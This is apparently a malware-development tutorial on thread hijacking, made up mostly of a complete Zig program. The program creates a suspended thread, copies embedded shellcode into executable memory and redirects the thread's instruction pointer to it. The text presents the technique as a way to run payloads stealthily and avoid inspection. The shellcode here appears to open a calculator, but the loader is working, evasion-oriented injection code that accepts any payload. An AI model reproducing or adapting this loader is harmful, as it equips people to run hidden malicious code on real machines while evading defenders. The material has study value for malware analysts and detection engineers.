Local Thread Creation
TL;DR
Local thread creation is a stealthy way to run shellcode within the context of the current process. Instead of launching an entirely new program, the malware spawns a thread in a suspended state and alters its execution context so the instruction pointer jumps to the payload. When resumed, the thread appears to be part of the normal application yet secretly executes arbitrary code. This approach avoids creating new processes and helps the malicious activity blend in with legitimate threads, making casual inspection much harder.
Code Walkthrough
main.zig
// NOTE:
// We run our payload in a hijacked thread instead of in a thread created
// directly for it. A thread created directly for the payload must have its
// entry point set to the payload's base address in memory, whereas a hijacked
// thread keeps an ordinary process function as its entry point, so the thread
// looks harmless, which is what we want here.
const std = @import("std");
const windows = std.os.windows;
const print = std.debug.print;
// Windows API types
// Aliases keep the Win32 spellings used by the declarations in this file.
const HANDLE = windows.HANDLE;
const DWORD = windows.DWORD;
const BOOL = windows.BOOL;
const PVOID = windows.PVOID;
const PBYTE = [*]u8;
const SIZE_T = windows.SIZE_T;
const WINAPI = windows.WINAPI;
// Signature of a thread entry point as accepted by CreateThread.
const LPTHREAD_START_ROUTINE = *const fn (?*anyopaque) callconv(WINAPI) DWORD;
// Memory protection constants
const PAGE_READWRITE: DWORD = windows.PAGE_READWRITE;
const PAGE_EXECUTE_READWRITE: DWORD = windows.PAGE_EXECUTE_READWRITE;
const MEM_COMMIT: DWORD = windows.MEM_COMMIT;
const MEM_RESERVE: DWORD = windows.MEM_RESERVE;
// Thread creation constants
const CREATE_SUSPENDED: DWORD = 0x00000004;
const INFINITE: DWORD = 0xFFFFFFFF;
// Context flags (x64 values, as defined in winnt.h)
//
// Every x64 context flag is the architecture bit CONTEXT_AMD64 OR-ed with a
// selector bit. CONTEXT_CONTROL was previously the bare selector 0x1, which
// did not agree with CONTEXT_ALL below (that one already included the
// architecture bit); both are now derived from the same base.
const CONTEXT_AMD64: DWORD = 0x00100000;
const CONTEXT_CONTROL: DWORD = CONTEXT_AMD64 | 0x00000001;
const CONTEXT_ALL: DWORD = CONTEXT_AMD64 | 0x00000001 | 0x00000002 | 0x00000004 | 0x00000008 | 0x00000010;
// Thread context structure for x64
//
// Field order and sizes follow the Win32 x64 CONTEXT layout: `Rip` sits at
// offset 0xF8, `FltSave` at 0x100, and the whole record is 0x4D0 bytes.
// Win32 declares CONTEXT as 16-byte aligned; without the explicit alignment
// on the first field this extern struct would only be 8-byte aligned, so a
// stack instance could land on an address the API rejects.
const CONTEXT = extern struct {
    // Register parameter home addresses (reserved for debugger use)
    // `align(16)` on the first field raises the alignment of the whole struct.
    P1Home: u64 align(16),
    P2Home: u64,
    P3Home: u64,
    P4Home: u64,
    P5Home: u64,
    P6Home: u64,
    // Control flags
    ContextFlags: DWORD,
    MxCsr: DWORD,
    // Segment registers and processor flags
    SegCs: u16,
    SegDs: u16,
    SegEs: u16,
    SegFs: u16,
    SegGs: u16,
    SegSs: u16,
    EFlags: DWORD,
    // Debug registers
    Dr0: u64,
    Dr1: u64,
    Dr2: u64,
    Dr3: u64,
    Dr6: u64,
    Dr7: u64,
    // Integer registers
    Rax: u64,
    Rcx: u64,
    Rdx: u64,
    Rbx: u64,
    Rsp: u64,
    Rbp: u64,
    Rsi: u64,
    Rdi: u64,
    R8: u64,
    R9: u64,
    R10: u64,
    R11: u64,
    R12: u64,
    R13: u64,
    R14: u64,
    R15: u64,
    // Program counter
    Rip: u64,
    // Floating point state
    FltSave: [512]u8, // XMM_SAVE_AREA32
    // Vector registers
    VectorRegister: [26][16]u8,
    VectorControl: u64,
    // Special debug control registers
    DebugControl: u64,
    LastBranchToRip: u64,
    LastBranchFromRip: u64,
    LastExceptionToRip: u64,
    LastExceptionFromRip: u64,
};
// kernel32 imports used by this file. Parameter names are local labels only;
// the types, order and calling convention define the ABI.

/// Creates a thread in the calling process; returns null on failure.
extern "kernel32" fn CreateThread(
    thread_attributes: ?*anyopaque,
    stack_size: SIZE_T,
    start_address: LPTHREAD_START_ROUTINE,
    parameter: ?*anyopaque,
    creation_flags: DWORD,
    thread_id: ?*DWORD,
) callconv(WINAPI) ?HANDLE;

/// Reserves and/or commits pages in the calling process; returns null on failure.
extern "kernel32" fn VirtualAlloc(
    address: ?*anyopaque,
    size: SIZE_T,
    allocation_type: DWORD,
    protect: DWORD,
) callconv(WINAPI) ?*anyopaque;

/// Changes the protection of committed pages; the previous protection is
/// written through `old_protect`. Returns 0 on failure.
extern "kernel32" fn VirtualProtect(
    address: *anyopaque,
    size: SIZE_T,
    new_protect: DWORD,
    old_protect: *DWORD,
) callconv(WINAPI) BOOL;

/// Reads the register context of `thread` into `context`. Returns 0 on failure.
extern "kernel32" fn GetThreadContext(
    thread: HANDLE,
    context: *CONTEXT,
) callconv(WINAPI) BOOL;

/// Writes `context` as the register context of `thread`. Returns 0 on failure.
extern "kernel32" fn SetThreadContext(
    thread: HANDLE,
    context: *const CONTEXT,
) callconv(WINAPI) BOOL;

/// Decrements the suspend count of `thread`.
extern "kernel32" fn ResumeThread(thread: HANDLE) callconv(WINAPI) DWORD;

/// Blocks until `handle` is signaled or `milliseconds` elapse.
extern "kernel32" fn WaitForSingleObject(handle: HANDLE, milliseconds: DWORD) callconv(WINAPI) DWORD;

/// Closes an open object handle. Returns 0 on failure.
extern "kernel32" fn CloseHandle(object: HANDLE) callconv(WINAPI) BOOL;

/// Returns the calling thread's last-error code.
extern "kernel32" fn GetLastError() callconv(WINAPI) DWORD;
const calc_payload = [_]u8{ 0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xE0, 0x1D, 0x2A, 0x0A, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x00 };
// Dummy function to use for the sacrificial thread
//
// Does a small amount of throwaway arithmetic and returns 0. Its only role in
// this file is to be a valid LPTHREAD_START_ROUTINE to hand to CreateThread.
fn DummyFunction(lpParameter: ?*anyopaque) callconv(WINAPI) DWORD {
    _ = lpParameter; // The thread parameter is not used.

    // Reinterpret the signed 64-bit timestamp as u64 rather than narrowing it
    // to u32 with @intCast: the narrowing cast traps in safe builds when the
    // clock value does not fit (negative, or past the u32 range). For values
    // that do fit, the resulting seed is the same.
    const seed: u64 = @bitCast(std.time.timestamp());
    var prng = std.Random.DefaultPrng.init(seed);
    const value = prng.random().int(i32);

    // Wrapping multiplication so the square cannot trap on overflow; the
    // product is intentionally discarded.
    _ = value *% value;
    return 0;
}
// Thread hijacking function
//
// Copies `pPayload` into freshly committed memory, switches that memory to
// PAGE_EXECUTE_READWRITE, and rewrites `Rip` in the context of `hThread` so
// that it points at the copy.
//
// Parameters:
//   hThread  - handle of the target thread; the caller in this file passes a
//              thread created with CREATE_SUSPENDED.
//   pPayload - bytes to copy into the new allocation.
//
// Returns true when every step succeeded. On failure an error line is printed
// and false is returned; the allocation made here is released in that case.
// On success the allocation is left in place, since the thread context now
// refers to it.
fn runViaClassicThreadHijacking(hThread: HANDLE, pPayload: []const u8) bool {
    // VirtualAlloc and VirtualProtect take SIZE_T, so the slice length is
    // passed as-is; narrowing it to DWORD first only added a cast that could trap.
    const pAddress = VirtualAlloc(null, pPayload.len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) orelse {
        print("[!] VirtualAlloc Failed With Error : {d}\n", .{GetLastError()});
        return false;
    };

    // Release the allocation on any early return below. The error message is
    // printed before the deferred call runs, so GetLastError() still reports
    // the failing API.
    var succeeded = false;
    defer if (!succeeded) windows.VirtualFree(pAddress, 0, windows.MEM_RELEASE);

    // Copying the payload to the allocated memory
    const dest = @as([*]u8, @ptrCast(pAddress))[0..pPayload.len];
    @memcpy(dest, pPayload);

    // Changing the memory protection
    var dwOldProtection: DWORD = 0;
    if (VirtualProtect(pAddress, pPayload.len, PAGE_EXECUTE_READWRITE, &dwOldProtection) == 0) {
        print("[!] VirtualProtect Failed With Error : {d}\n", .{GetLastError()});
        return false;
    }

    // NOTE:
    // Zig has no implicit zero-initialization, so every field is zeroed
    // explicitly with std.mem.zeroes before ContextFlags is set. This is the
    // counterpart of the C form `CONTEXT ctx = { .ContextFlags = ... };`,
    // where C99 6.7.8p21 initializes all members not named in the initializer
    // as if they had static storage duration (i.e. to zero).
    //
    // .ContextFlags can be CONTEXT_CONTROL or CONTEXT_ALL as well
    var ThreadCtx = std.mem.zeroes(CONTEXT);
    ThreadCtx.ContextFlags = CONTEXT_CONTROL;

    // Getting the original thread context
    if (GetThreadContext(hThread, &ThreadCtx) == 0) {
        print("[!] GetThreadContext Failed With Error : {d}\n", .{GetLastError()});
        return false;
    }

    // Updating the next instruction pointer to be equal to the payload's address
    // in case of a x64 payload injection : we change the value of `Rip`
    // in case of a x32 payload injection : we change the value of `Eip`
    ThreadCtx.Rip = @intFromPtr(pAddress);

    // Setting the new updated thread context
    if (SetThreadContext(hThread, &ThreadCtx) == 0) {
        print("[!] SetThreadContext Failed With Error : {d}\n", .{GetLastError()});
        return false;
    }

    succeeded = true;
    return true;
}
// Wait for user input (equivalent to getchar())
//
// Consumes standard input up to and including the next '\n', or until end of
// input. Nothing is buffered, so a line of any length is consumed in full;
// the earlier fixed 256-byte buffer stopped early on longer lines and left the
// remainder to satisfy the next prompt immediately. Read errors are reported
// instead of being silently dropped, and the function still returns normally.
fn waitForEnter() void {
    std.io.getStdIn().reader().skipUntilDelimiterOrEof('\n') catch |err| {
        print("[!] Reading From Stdin Failed : {s}\n", .{@errorName(err)});
    };
}
// Main function (equivalent to C main)
//
// Creates a suspended thread whose entry point is DummyFunction, hands it to
// runViaClassicThreadHijacking together with `calc_payload`, then waits for
// <Enter>, resumes the thread, and waits for it to finish. Every failure is
// reported on the console and ends the program early; no error is returned.
pub fn main() !void {
    var dwThreadId: DWORD = 0;

    // Creating sacrificial thread in suspended state
    //
    // NOTE:
    // We can also use SuspendThread to suspend a thread.
    // To learn more: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread
    const hThread = CreateThread(null, 0, &DummyFunction, null, CREATE_SUSPENDED, &dwThreadId) orelse {
        print("[!] CreateThread Failed With Error : {d}\n", .{GetLastError()});
        return;
    };
    // Cleanup: a single deferred close covers every exit path below.
    defer _ = CloseHandle(hThread);

    print("[i] Hijacking Thread Of Id : {d}\n", .{dwThreadId});

    // Hijacking the sacrificial thread created
    if (!runViaClassicThreadHijacking(hThread, &calc_payload)) return;
    print("[+] DONE\n", .{});

    print("[#] Press <Enter> To Run The Payload ...", .{});
    waitForEnter();

    // Resuming suspended thread, so that it runs our shellcode.
    // ResumeThread reports failure as (DWORD)-1. If the thread was never
    // resumed, the infinite wait below would never return, so stop here.
    if (ResumeThread(hThread) == std.math.maxInt(DWORD)) {
        print("[!] ResumeThread Failed With Error : {d}\n", .{GetLastError()});
        return;
    }

    // Wait for the thread to complete
    _ = WaitForSingleObject(hThread, INFINITE);

    print("[#] Press <Enter> To Quit...", .{});
    waitForEnter();
}